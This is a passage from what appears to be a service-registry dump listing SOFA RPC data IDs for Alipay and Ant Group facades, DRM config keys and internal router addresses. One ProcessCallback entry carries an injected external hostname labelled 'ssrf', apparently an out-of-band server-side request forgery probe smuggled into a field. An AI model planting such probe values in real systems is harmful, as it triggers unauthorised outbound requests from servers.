SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:STORAGE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.McenterAccountAliasFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.amc.service.AmcToolTaskChatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_C_LUCKYFOREST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.scheduler.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:cn.com.antcloud.acprovisioncore.common.facade.application.AppManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.iopencms.common.service.facade.api.ApplyOrderMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.TXBusinessHallFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransCheckQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:fporgassetrobot@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0.1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.190.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ifundprod.common.service.facade.api.InquiryTransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbaudit.common.service.facade.audit.FormalShopAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:dsmp4int_smartbiz_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_B_COD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aivolvo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","kbsales@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.scheduler:name=com.alipay.scheduler.route.drm.SchedulerRuleResource.enable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.vega-integration-kepler:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.asset.profile.service.UserAnonymousCheckManager.checkFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.mart.facade.SocialTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:kbadvert@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.162.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.settlecore.service.facade.depositback.DepositBackFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbprocess.common.service.facade.callback.ProcessCallback:1.0:ikbservcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaxconnectplatform.common.service.facade.xphub.XpServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.amberdata.metadata.service.MetadataColumnConfigService:1.0:metadataColumnConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.192.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antfinancial.antchain.cloud.endpoint.facade.DataSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.goldenOfflineSwitchConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.infosec.common.shared.tools.httpclient.HttpClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:riskmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepayfront.service.facade.errplateform.MobilePayCommonErrorCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlsmicrogw.common.service.facade.gateway.api.IntentionTreeDataVisualFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clientgw.common.service.DispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_2320#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.infosec.content.service.facade.InfosecForInfostudioService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.itest.capture.service.ItestCaptureService:1.0:${Dynamic-Module-Name}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.acctrans.facade.api.acctrans.AcctransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cloudinc:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.228.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paydecision.service.api.PayModeDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.accountNoSwitcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.standard.facade.api.ParmCacheDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.codprod.common.service.facade.merchant.facade.MerchantConfigAddFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTFEATUREMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.utraffictrip.common.service.facade.UttConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.InsuranceAmountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.renewalCheckNew,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.guardianconsole.facade.configs.service.GuardianConfigFacade:1.0:guardianconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.opscloudprod.facade.meta.OpsCldMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchmobile.store.service.facade.NewsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:identitymatrix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.TableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCCreditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.0.167.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.chaos.dig.facade.FieldFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.imaspmng.common.service.facade.NotifyGrayCoreSyncDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.177.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprotocol.common.service.integration.cif.UserAgreementRzoneQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.delivery.RecDeliveryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.air.sdk.impl.dynamic.DynamicModuleClient:1.0:igausscn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.debug.ChangeServiceSyncExecuteDebugFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.PcreditActivityCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.rec.service.PcreditMarketRecConfigurationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.card.api.FortuneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alphasec.compass.operating.facade.service.RiskTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.databus.common.service.facade.RPCDrivedStream:1.0:busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.TradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.zskynet.zskynetDataSource.groupLabelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopprod.neardata.query.service.ItemTemplateQueryClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.showMaterialFundAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.30.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finvirtualta.core.service.yeb.repository.VirtualAdvanceAccountInfoRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.ocr.EpOCRGenericService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.stock.StockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bis.common.service.facade.papers.ShopPhotosAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdBankCardOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.137.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tss.timer.common.service.facade.TimerTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcalbmng.facade.paramcore.ParamCoreMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundbankcore.common.service.facade.FundBankForceRedeemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fabric@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.investment.InvestTradingSchemeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetnet.common.service.facade.api.AstProductServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.topic.isNotDetailPageDowngradeContents,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.42.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dt.onedata3.schedule.rpc.service.LogicalTableNodeMetaService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eventengine.common.service.facade.api.RiskEventMapperService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.175.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rule.common.base.service.ScriptValidateService:1.0:DISCOUNT@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:pcreditmarket@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilelbs.common.service.facade.ldc.MobilelbsUserServiceInRZone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.mybank.bkebank.common.service.facade.BkebankOrderApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openauth.common.service.facade.request.RequestTokenManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.service.facade.ChannelRouterQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INTIMATEPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.SimpleInTransUniqQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.ProductFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundselling.common.service.tradequery.facade.TradeQueryDetailService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.allowance.InsLifeAllowanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:@86842598-80102053-uniqueId-104003026.ssrf.noble.log.lynnshare.cc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.shared.transport.ScardCenterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.ops.OpsCommonFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.manage.TemplateMetadataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promorulecenter.common.service.facade.RuleModelManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.228.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.ficc.goldb2c.api.ShareTemplateConfQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ssprod.common.service.facade.institution.SocialInstitutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.PeerPayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.incomestatistics.facade.api.IncomeOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:PCREDITKIT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeha.sdk.core.api.HaErrorCodeConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_authorize_state_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:imobilewp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExClientRateGroupConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxlib.common.shared.facade.ConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexpprod.service.facade.api.checkout.CheckoutInquiryOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkibdeposit.common.service.facade.query.SettleCardInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igdispute.common.service.facade.RetrievalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.UserProfileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillFamilyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.service.loan.drm.DeferOperateUtilDrm.deferApplyAutoFailSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_antreplay_merge#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialportal.web.ps.rpc.facade.multichannel.MultiChannelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.43.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inscharityprod.common.service.facade.InsCharityAidedPersonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finasmcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fcfeecharge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdQualificationInfoQueryMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TTP_C_MOBILEAPPSETCTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mquery.common.service.facade.app.AppQueryProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.OssFileServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_TEST_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gotone.common.service.api.MessageSendService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsLdcManager.tabFundShopEquityEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.regtech.facade.RegReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilechat.common.service.facade.api.GroupInvitationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.squid.ResearchReportManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.common.service.facade.riskentity.RmcMetaEntityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mashup:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_OPENEVENT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_dcepcore_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.zhihuPropagationLevelLow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_TROUBLEHUNTER#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.10.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_172.21.104.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:mobileappcommon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.selleradmit.AgdsWarmUpSellerAdmitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebill.common.service.facade.select.BillListSelectCallbackService:1.0:antinvoice@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alipay-rule-engine@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.comment.CommentBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.LpLoanApplyConfigDrm.addGrantSuspendOrgCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.opinioncore.yqcoreZdalDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.pipeline.common.facade.core.validate.PipelineValidateService:1.0:dppipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.212.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:gzmsdfwop-wshopmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilityprod.common.service.facade.dynamic.AbilityDynamicMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.zongshuEcCustomsInfo2,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.facade.UserExperienceInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicreateweb.api.TrSiteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-imtmsvcprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkpaycore.common.standardfundprod.service.FundOrderProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.decisionmaker.api.AnnaDecisionMakerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mmtcaftscmdproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.data.AccountsService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.utils.HolidayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zcache.tbase.customerv2.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.biz.shared.scheduler.executor.AlmExecutor:1.0:almRule@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:commonSchedulerExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.AblityFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.alipaypointcust.common.service.facade.task.service.CustomerCenterTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payacceptance.common.service.spi.callback.PaymentCallbackService:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.PermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoitem.common.manage.facade.api.ItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.mmng.drm.FuCardDrm.skipCheckPermission,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.service.facade.appraise.EcoFlowAppraiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.1:multiUserCallBackTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.core.service.commonservice.ModelProductionDispatchingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.fundscheme.FundSchemeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:publicDomain_zmcie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:jobDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.${datacontext_service_unique_id}:name=com.alipay.datacontextlib.dataswap.client.drm.DataSwapGlobalDrmResource.properties,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesearch.common.service.facade.SearchFoundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.checker.YebCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.api.RegisterInstItemFileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.common.service.facade.cyclebudget.CycleBudgetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.mng.AuthorityManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:distinguishprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.cif.client.drm.TairToTbaseSwitch.fullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.124.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.business.platform.enterprise.facade.EntAlipayCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcservcenter.client.RcClientInvoker:1.0:rdeclarecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.revcore.common.service.finaccenter.facade.api.FinAccountingControlQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finbaservice.common.service.facade.match.api.MatchProductAggrModelQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:completeAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.